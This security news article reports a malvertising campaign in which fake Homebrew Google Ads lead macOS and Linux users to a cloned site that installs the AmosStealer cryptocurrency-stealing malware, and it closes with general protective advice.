Cybersecurity researchers have uncovered a sophisticated malware campaign targeting macOS and Linux users through malicious Google Ads that impersonate the popular package manager Homebrew. The campaign deploys the dangerous AmosStealer malware, specifically designed to harvest cryptocurrency wallet credentials and sensitive financial data.
Campaign Discovery and Attack Vector Analysis
Security researcher Ryan Chenki first identified this threat, which employs an advanced spoofing technique. The attackers create Google Ads displaying the legitimate Homebrew URL (brew.sh) but redirect victims to a nearly identical phishing domain brewe[.]sh. This sophisticated social engineering tactic has proven effective even against experienced users familiar with the legitimate Homebrew project.
Technical Analysis of AmosStealer Capabilities
AmosStealer, also known as Atomic, represents a new generation of information stealers specifically engineered for macOS environments. The malware operates under a Malware-as-a-Service (MaaS) model, with operators charging $1,000 monthly subscriptions for access to its infrastructure. Its primary functionality focuses on extracting sensitive data from more than 50 cryptocurrency extensions and wallets, including major platforms like Binance, Coinomi, Electrum, and Exodus.
Infection Chain and Distribution Mechanism
The attack sequence begins when users click on malicious Google Ads appearing in search results. Victims are directed to a convincing clone of the Homebrew website, where they’re prompted to execute a terminal command that appears identical to the legitimate Homebrew installation instruction. This command, however, initiates the download and installation of the AmosStealer malware instead of the intended package manager.
Security Industry Response and Mitigation
Homebrew project lead Mike McQuaid has acknowledged the ongoing campaign, though noting limited options for direct intervention. The incident has sparked criticism of Google’s ad verification processes, with security experts calling for more stringent controls on advertisement content validation.
To protect against this and similar threats, security experts recommend implementing multiple layers of verification when installing software. Users should manually type official URLs rather than clicking ads, verify digital signatures of downloaded packages, and maintain updated endpoint security solutions. The incident serves as a crucial reminder that even seemingly trustworthy sources like Google Ads can be weaponized for malware distribution, necessitating constant vigilance in today’s threat landscape.
